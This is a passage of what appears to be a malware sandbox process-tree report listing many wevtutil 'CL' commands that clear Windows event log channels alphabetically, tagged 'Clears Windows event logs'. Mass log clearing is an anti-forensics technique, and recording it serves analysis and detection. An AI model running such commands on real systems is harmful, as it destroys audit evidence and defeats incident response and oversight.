C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Crypto-NCrypt/Operational"3⤵PID:8084
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Crypto-RNG/Analytic"3⤵PID:10588
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Crypto-RSAEnh/Analytic"3⤵PID:12100
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-D3D10Level9/Analytic"3⤵PID:11920
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-D3D10Level9/PerfTiming"3⤵
- System Location Discovery: System Language Discovery
PID:3652
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-DAL-Provider/Analytic"3⤵PID:11544
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-DAL-Provider/Operational"3⤵PID:11676
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-DAMM/Diagnostic"3⤵
- System Location Discovery: System Language Discovery
PID:11288
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-DCLocator/Debug"3⤵PID:8660
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-DDisplay/Analytic"3⤵PID:7344
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-DDisplay/Logging"3⤵
- Clears Windows event logs
PID:11180
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-DLNA-Namespace/Analytic"3⤵PID:8464
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-DNS-Client/Operational"3⤵PID:11828
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-DSC/Admin"3⤵PID:11520
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-DSC/Analytic"3⤵PID:11468
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-DSC/Debug"3⤵PID:11484
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-DSC/Operational"3⤵PID:3836
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-DUI/Diagnostic"3⤵PID:7268
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-DUSER/Diagnostic"3⤵PID:7452
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-DXGI/Analytic"3⤵PID:8188
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-DXGI/Logging"3⤵
- Clears Windows event logs
PID:11144
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-DXP/Analytic"3⤵PID:6292
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Data-Pdf/Debug"3⤵PID:7812
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-DataIntegrityScan/Admin"3⤵PID:9996
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-DataIntegrityScan/CrashRecovery"3⤵PID:9472
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-DateTimeControlPanel/Analytic"3⤵PID:8368
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-DateTimeControlPanel/Debug"3⤵PID:7788
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-DateTimeControlPanel/Operational"3⤵PID:12012
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Deduplication/Diagnostic"3⤵PID:8892
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Deduplication/Operational"3⤵PID:9140
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Deduplication/Performance"3⤵PID:9340
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Deduplication/Scrubbing"3⤵PID:6608
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Defrag-Core/Debug"3⤵PID:9496
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Deplorch/Analytic"3⤵PID:10076
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-DesktopActivityModerator/Diagnostic"3⤵PID:5972
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-DesktopWindowManager-Diag/Diagnostic"3⤵PID:12200
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-DeviceAssociationService/Performance"3⤵PID:11636
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-DeviceConfidence/Analytic"3⤵PID:12156
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-DeviceGuard/Operational"3⤵PID:12104
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-DeviceGuard/Verbose"3⤵PID:7396
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider/Admin"3⤵PID:7496
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider/Debug"3⤵PID:9952
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider/Operational"3⤵PID:12132
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-DeviceSetupManager/Admin"3⤵PID:10848
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-DeviceSetupManager/Analytic"3⤵
- System Location Discovery: System Language Discovery
PID:11776
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-DeviceSetupManager/Debug"3⤵
- Clears Windows event logs
PID:7332
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-DeviceSetupManager/Operational"3⤵PID:7840
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-DeviceSync/Analytic"3⤵PID:6604
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-DeviceSync/Operational"3⤵PID:10284
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-DeviceUpdateAgent/Operational"3⤵PID:12180
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-DeviceUx/Informational"3⤵PID:7016
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-DeviceUx/Performance"3⤵PID:10288
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Devices-Background/Operational"3⤵PID:12092
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Dhcp-Client/Admin"3⤵PID:11728
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Dhcp-Client/Operational"3⤵PID:7912
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Dhcpv6-Client/Admin"3⤵PID:10268
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Dhcpv6-Client/Operational"3⤵PID:9956
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-DiagCpl/Debug"3⤵PID:4976
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Diagnosis-AdvancedTaskManager/Analytic"3⤵
- Clears Windows event logs
PID:10340
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Diagnosis-DPS/Analytic"3⤵PID:11204
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Diagnosis-DPS/Debug"3⤵PID:9076
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Diagnosis-DPS/Operational"3⤵PID:8560
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Diagnosis-MSDE/Debug"3⤵
- Clears Windows event logs
PID:6684
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Diagnosis-PCW/Analytic"3⤵PID:7760
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Diagnosis-PCW/Debug"3⤵PID:9440
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Diagnosis-PCW/Operational"3⤵PID:9560
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Diagnosis-PLA/Debug"3⤵PID:9116
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Diagnosis-PLA/Operational"3⤵PID:8732
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Diagnosis-Perfhost/Analytic"3⤵PID:8384
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Diagnosis-Scheduled/Operational"3⤵PID:6560
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Diagnosis-Scripted/Admin"3⤵PID:8220
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Diagnosis-Scripted/Analytic"3⤵PID:7892
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Diagnosis-Scripted/Debug"3⤵PID:9060
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Diagnosis-Scripted/Operational"3⤵
- System Location Discovery: System Language Discovery
PID:8000
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Diagnosis-ScriptedDiagnosticsProvider/Debug"3⤵PID:6468
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Diagnosis-ScriptedDiagnosticsProvider/Operational"3⤵
- Clears Windows event logs
PID:2468
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Diagnosis-WDC/Analytic"3⤵PID:4952
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Diagnosis-WDI/Debug"3⤵PID:10148
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Diagnostics-Networking/Debug"3⤵PID:10020
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Diagnostics-Networking/Operational"3⤵
- System Location Discovery: System Language Discovery
PID:6700
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Diagnostics-PerfTrack-Counters/Diagnostic"3⤵PID:9764
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Diagnostics-PerfTrack/Diagnostic"3⤵PID:2508
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Diagnostics-Performance/Diagnostic"3⤵PID:9644
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Diagnostics-Performance/Diagnostic/Loopback"3⤵PID:6508
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Diagnostics-Performance/Operational"3⤵PID:3640
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Direct3D10/Analytic"3⤵PID:6736
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Direct3D10_1/Analytic"3⤵PID:10388
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Direct3D11/Analytic"3⤵PID:9388
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Direct3D11/Logging"3⤵PID:8652
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Direct3D11/PerfTiming"3⤵PID:4852
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Direct3D12/Analytic"3⤵PID:8108
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Direct3D12/Logging"3⤵PID:7688
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Direct3D12/PerfTiming"3⤵
- System Location Discovery: System Language Discovery
PID:7588
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Direct3D9/Analytic"3⤵PID:6340
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Direct3DShaderCache/Default"3⤵PID:10352
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-DirectComposition/Diagnostic"3⤵PID:10152
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-DirectManipulation/Diagnostic"3⤵PID:9464
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-DirectShow-KernelSupport/Performance"3⤵PID:6928
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-DirectSound/Debug"3⤵PID:1972
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Disk/Operational"3⤵PID:6564
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-DiskDiagnostic/Operational"3⤵PID:10120
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-DiskDiagnosticDataCollector/Operational"3⤵PID:9928
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-DiskDiagnosticResolver/Operational"3⤵PID:5432
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Dism-Api/Analytic"3⤵PID:10260
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Dism-Api/ExternalAnalytic"3⤵PID:9120
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Dism-Api/InternalAnalytic"3⤵PID:9284
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Dism-Cli/Analytic"3⤵PID:7108
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-DisplayColorCalibration/Debug"3⤵PID:6640
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-DisplayColorCalibration/Operational"3⤵PID:9300
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-DisplaySwitch/Diagnostic"3⤵PID:11740
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Documents/Performance"3⤵PID:10596
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Dot3MM/Diagnostic"3⤵PID:9916
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-DriverFrameworks-UserMode/Operational"3⤵PID:3748
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-DucUpdateAgent/Operational"3⤵PID:10700
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Dwm-API/Diagnostic"3⤵PID:8056
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Dwm-Core/Diagnostic"3⤵PID:10936
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Dwm-Dwm/Diagnostic"3⤵PID:11148
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Dwm-Redir/Diagnostic"3⤵PID:11048
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Dwm-Udwm/Diagnostic"3⤵PID:7324
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-DxgKrnl-Admin"3⤵PID:9056
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-DxgKrnl-Operational"3⤵PID:8060
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-DxgKrnl/Contention"3⤵PID:7528
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-DxgKrnl/Diagnostic"3⤵
- Clears Windows event logs
PID:9348
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-DxgKrnl/Performance"3⤵PID:7576
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-DxgKrnl/Power"3⤵PID:7492
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-DxpTaskSyncProvider/Analytic"3⤵
- Clears Windows event logs
PID:7032
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-EDP-Application-Learning/Admin"3⤵PID:7716
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-EDP-Audit-Regular/Admin"3⤵PID:6832
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-EDP-Audit-TCB/Admin"3⤵PID:7992
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-EFS/Debug"3⤵PID:6516
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-ESE/IODiagnose"3⤵PID:6912
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-ESE/Operational"3⤵
- Clears Windows event logs
PID:4840
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-EapHost/Analytic"3⤵PID:8520
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-EapHost/Debug"3⤵PID:2768
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-EapHost/Operational"3⤵PID:10560
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-EapMethods-RasChap/Operational"3⤵PID:6732
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-EapMethods-RasTls/Operational"3⤵PID:7132
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-EapMethods-Sim/Operational"3⤵PID:10660
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-EapMethods-Ttls/Operational"3⤵PID:10928
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-EaseOfAccess/Diagnostic"3⤵PID:7664
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Energy-Estimation-Engine/EventLog"3⤵PID:9012
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Energy-Estimation-Engine/Trace"3⤵PID:9628
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-EnhancedStorage-EhStorTcgDrv/Analytic"3⤵PID:8756
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-EventCollector/Debug"3⤵PID:5632
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-EventCollector/Operational"3⤵PID:9408
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-EventLog-WMIProvider/Debug"3⤵PID:7744
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-EventLog/Analytic"3⤵PID:7388
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-EventLog/Debug"3⤵PID:5544
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-FMS/Analytic"3⤵PID:9312
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-FMS/Debug"3⤵PID:10380
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-FMS/Operational"3⤵PID:7592
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-FailoverClustering-Client/Diagnostic"3⤵PID:11040
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Fault-Tolerant-Heap/Operational"3⤵PID:6548
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-FeatureConfiguration/Analytic"3⤵PID:7500
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-FeatureConfiguration/Operational"3⤵PID:7900
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-FileHistory-Catalog/Analytic"3⤵PID:6796
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-FileHistory-Catalog/Debug"3⤵PID:9636
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-FileHistory-ConfigManager/Analytic"3⤵PID:10792
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-FileHistory-ConfigManager/Debug"3⤵PID:6956
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-FileHistory-Core/Analytic"3⤵
- System Location Discovery: System Language Discovery
PID:9540
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-FileHistory-Core/Debug"3⤵
- Clears Windows event logs
PID:6208
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-FileHistory-Core/WHC"3⤵PID:2512
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-FileHistory-Engine/Analytic"3⤵PID:8588
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-FileHistory-Engine/BackupLog"3⤵PID:11000
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-FileHistory-Engine/Debug"3⤵PID:6408
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-FileHistory-EventListener/Analytic"3⤵PID:7252
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-FileHistory-EventListener/Debug"3⤵PID:6776
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-FileHistory-Service/Analytic"3⤵PID:9136
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-FileHistory-Service/Debug"3⤵PID:8028
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-FileHistory-UI-Events/Analytic"3⤵PID:3688
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-FileHistory-UI-Events/Debug"3⤵PID:6644
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-FileInfoMinifilter/Operational"3⤵PID:10740
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Firewall-CPL/Diagnostic"3⤵PID:7424
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Folder Redirection/Operational"3⤵
- System Location Discovery: System Language Discovery
PID:9316
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Forwarding/Debug"3⤵PID:6992
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Forwarding/Operational"3⤵
- Clears Windows event logs
PID:11168
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-GPIO-ClassExtension/Analytic"3⤵
- Clears Windows event logs
PID:9552
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-GenericRoaming/Admin"3⤵PID:2352
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-GroupPolicy/Operational"3⤵
- System Location Discovery: System Language Discovery
PID:6316
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-HAL/Debug"3⤵
- System Location Discovery: System Language Discovery
PID:10016
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-HealthCenter/Debug"3⤵PID:10688
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-HealthCenter/Performance"3⤵PID:7372
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-HealthCenterCPL/Performance"3⤵PID:7004
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-HelloForBusiness/Operational"3⤵PID:6892
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Help/Operational"3⤵PID:8532
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-HomeGroup Control Panel Performance/Diagnostic"3⤵PID:12016
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-HomeGroup Control Panel/Operational"3⤵
- Clears Windows event logs
PID:9840
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-HomeGroup Listener Service/Operational"3⤵PID:8596
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-HomeGroup Provider Service Performance/Diagnostic"3⤵PID:8288
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-HomeGroup Provider Service/Operational"3⤵PID:5408
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-HomeGroup-ListenerService"3⤵
- Clears Windows event logs
PID:8088
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-HotspotAuth/Analytic"3⤵PID:8696
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-HotspotAuth/Operational"3⤵PID:9160
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-HttpService/Log"3⤵PID:10668
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-HttpService/Trace"3⤵PID:10548
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Hyper-V-Guest-Drivers/Admin"3⤵PID:10620
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Hyper-V-Guest-Drivers/Analytic"3⤵PID:11060
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Hyper-V-Guest-Drivers/Debug"3⤵PID:9760
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Hyper-V-Guest-Drivers/Diagnose"3⤵PID:6932
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Hyper-V-Guest-Drivers/Operational"3⤵PID:8468
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Hyper-V-Hypervisor-Admin"3⤵PID:8920
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Hyper-V-Hypervisor-Analytic"3⤵PID:7580
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Hyper-V-Hypervisor-Operational"3⤵PID:7872
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Hyper-V-NETVSC/Diagnostic"3⤵PID:6472
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Hyper-V-VID-Admin"3⤵
